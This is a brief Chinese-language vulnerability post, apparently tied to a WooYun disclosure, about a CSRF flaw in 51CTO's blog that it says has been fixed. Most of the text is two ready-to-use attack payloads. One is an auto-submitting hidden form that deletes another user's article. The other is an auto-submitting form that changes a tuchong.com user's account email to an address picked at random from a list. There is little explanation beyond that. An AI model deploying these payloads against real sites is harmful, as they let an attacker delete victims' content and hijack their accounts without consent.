51cto CSRF漏洞

http://wooyun.org/bugs/wooyun-2010-052368积极反馈给51CTO修复了。漏洞可以删掉非自己的文章。<form method='post'action='http:

.

http://wooyun.org/bugs/wooyun-2010-052368

积极反馈给51CTO修复了。

漏洞可以删掉非自己的文章。

<form method='post'action='http://crazysmogu.blog.51cto.com/user_index.php?action=delarticle'><input type='text'value='del'name='job'style='display:none!important;display:block;width=0;height=0'/><input type='text'value='1112261'name='selid'style='display:none!important;display:block;width=0;height=0'/></form><script>document.forms[0].submit();</script>

<html>
<body>
<form name="csrf" action="http://tuchong.com/api/user/modify/" method="POST">
<input type=text name=section value="basicinfo"></input>
<script>
var email =['[email protected]','[email protected]','[email protected]','[email protected]','[email protected]','[email protected]','[email protected]','[email protected]','[email protected]','[email protected]'];
function Rand(arr, len) { 
    arr.sort(function () { 
        return Math.random()-0.5; 
    }); 
    return arr.slice(0, len); 
}
//alert(Rand(email,1));
document.write("<input type=text name=user_email value="+Rand(email,1)+"></input>");
</script>
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>

.
.

.